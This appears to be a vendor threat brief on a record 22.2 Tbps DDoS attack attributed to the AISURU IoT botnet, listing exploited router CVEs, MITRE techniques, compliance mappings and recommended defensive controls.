Executive Summary
In September 2025, Cloudflare successfully mitigated a record-breaking Distributed Denial-of-Service (DDoS) attack that peaked at 22.2 Tbps and 10.6 billion packets per second. Orchestrated over just 40 seconds, the massive volumetric attack overwhelmed network infrastructure, pushing the limits of firewalls, routers, and load balancers. Prior research links recent large-scale DDoS campaigns—including those hitting Cloudflare—to the AISURU botnet, which leveraged a sudden increase in infected devices globally, stemming in part from exploited router firmware vulnerabilities. Business impact was minimized due to Cloudflare’s rapid mitigation, but the attack underscores the ever-increasing scale and sophistication of DDoS threats.
Record-breaking DDoS attacks are climbing in frequency and intensity, with attackers exploiting IoT vulnerabilities and leveraging formidable botnets. This surge highlights the urgent need for resilient, scalable mitigation strategies, and amplifies ongoing regulatory and industry pressure to strengthen defenses against large-scale infrastructure threats.
Why This Matters Now
This incident demonstrates that DDoS attack scale and velocity are outpacing traditional network defenses, driven by massive IoT botnets like AISURU. Organizations must rapidly adapt, as such attacks can disrupt business continuity and erode trust, even with world-leading mitigation services. The escalating arms race between attackers and defenders makes immediate investment in modern DDoS resilience and compliance essential.
Attack Path Analysis
Attackers leveraged a massive IoT botnet to compromise vulnerable edge devices, rapidly enrolling them in the botnet for coordinated activity. Privilege escalation on these devices enabled persistent botnet control and further weaponization. Through lateral movement, malware propagated across similar device types within exposed network zones, increasing botnet size and redundancy. Command and control channels were established to orchestrate and synchronize large-scale volumetric DDoS attacks. While exfiltration was not the goal, outbound communications managed bot updates and attack instructions. Ultimately, the impact was a highly disruptive multi-terabit-per-second DDoS attack on targeted internet infrastructure, threatening widespread service availability.
Kill Chain Progression
Initial Compromise
Description
Attackers exploited known vulnerabilities in internet-exposed routers, IP cameras, and IoT devices to gain initial access, enrolling them in the botnet.
Related CVEs
CVE-2017-5259
CVSS 9.8A command injection vulnerability in Cambium Networks' cnPilot routers allows remote attackers to execute arbitrary commands via crafted input.
Affected Products:
Cambium Networks cnPilot Routers – All versions prior to firmware update addressing CVE-2017-5259
Exploit Status:
exploited in the wildCVE-2023-28771
CVSS 9.8A command injection vulnerability in Zyxel devices allows remote attackers to execute arbitrary commands via crafted input.
Affected Products:
Zyxel Various Devices – All versions prior to firmware update addressing CVE-2023-28771
Exploit Status:
exploited in the wildCVE-2023-50381
CVSS 9.8A vulnerability in Realtek Jungle SDK allows remote attackers to execute arbitrary code via crafted input.
Affected Products:
Realtek Jungle SDK – All versions prior to firmware update addressing CVE-2023-50381
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
Network Denial of Service
Endpoint Denial of Service
Compromise Infrastructure
Acquire Botnet
Exploit Public-Facing Application
Hardware Additions
Valid Accounts
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Implement Incident Response Procedures
Control ID: 12.10
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 10
CISA ZTMM 2.0 – Monitor Traffic for Abnormal Patterns
Control ID: Network and Environment - Proactive Monitoring
NIS2 Directive – Security Requirements for Essential and Important Entities
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Financial Services
Record 22.2 Tbps DDoS attacks threaten online banking availability, requiring enhanced egress security and threat detection capabilities to maintain customer service continuity.
Internet
Massive volumetric attacks targeting infrastructure providers demand multicloud visibility, zero trust segmentation, and inline IPS protection against evolving botnet campaigns like AISURU.
E-Learning
Educational platforms face service disruption from high-volume DDoS attacks, necessitating cloud firewall protection and encrypted traffic monitoring to ensure learning accessibility.
Government Administration
Critical government services vulnerable to 10.6 Bpps packet floods require comprehensive threat detection, secure hybrid connectivity, and compliance-mapped security controls.
Sources
- Cloudflare mitigates new record-breaking 22.2 Tbps DDoS attackhttps://www.bleepingcomputer.com/news/security/cloudflare-mitigates-new-record-breaking-222-tbps-ddos-attack/Verified
- Aisuru botnet behind new record-breaking 29.7 Tbps DDoS attackhttps://www.bleepingcomputer.com/news/security/aisuru-botnet-behind-new-record-breaking-297-tbps-ddos-attack/Verified
- Aisuru Botnet Powers Record DDoS Attack Peaking at 29 Tbpshttps://www.securityweek.com/aisuru-botnet-powers-record-ddos-attack-peaking-at-29-tbps/Verified
- Aisuru botnet responsible for 29.7 Tbps DDoS attackhttps://hackmag.com/news/aisuru-recordVerified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Zero Trust Segmentation, Inline Threat Detection, and Cloud Network Security Fabric controls directly reduce the ability for compromised devices to participate in DDoS botnets and limit blast radius. Microsegmentation, egress enforcement, and high-performance encrypted network controls confine lateral spread, block malicious outbound command traffic, and reduce the surface for massive DDoS attacks.
Control: Cloud Firewall (ACF)
Mitigation: Prevents inbound exploitation traffic from reaching unpatched or exposed devices.
Control: Threat Detection & Anomaly Response
Mitigation: Detects unusual privilege escalation or firmware anomaly on monitored devices.
Control: Zero Trust Segmentation
Mitigation: Restricts east-west traffic flows, inhibiting malware spread to additional assets.
Control: Egress Security & Policy Enforcement
Mitigation: Blocks unauthorized outbound traffic and detects suspicious C2 communication.
Control: Multicloud Visibility & Control
Mitigation: Enables rapid detection of unexpected outbound communications.
Mitigates or rates-limits DDoS traffic at scale with inline distributed enforcement.
Impact at a Glance
Affected Business Functions
- Network Operations
- Customer Services
- Online Transactions
Estimated downtime: 1 days
Estimated loss: $5,000,000
No data exposure reported; the primary impact was service disruption due to the volumetric DDoS attack.
Recommended Actions
Key Takeaways & Next Steps
- • Deploy Zero Trust Segmentation and microsegmentation to prevent lateral malware propagation between device and workload groups.
- • Enforce rigorous egress controls and FQDN filtering to block device-to-internet connections and command-and-control operations.
- • Utilize Cloud Native Security Fabric for real-time detection and automated throttling of large-scale DDoS and anomalous traffic at the core and edge.
- • Implement cloud firewalls with AI threat intelligence to reduce the exposed attack surface and block inbound exploitation attempts.
- • Enhance visibility and anomaly response across cloud and hybrid environments with centralized control and event monitoring pipelines.
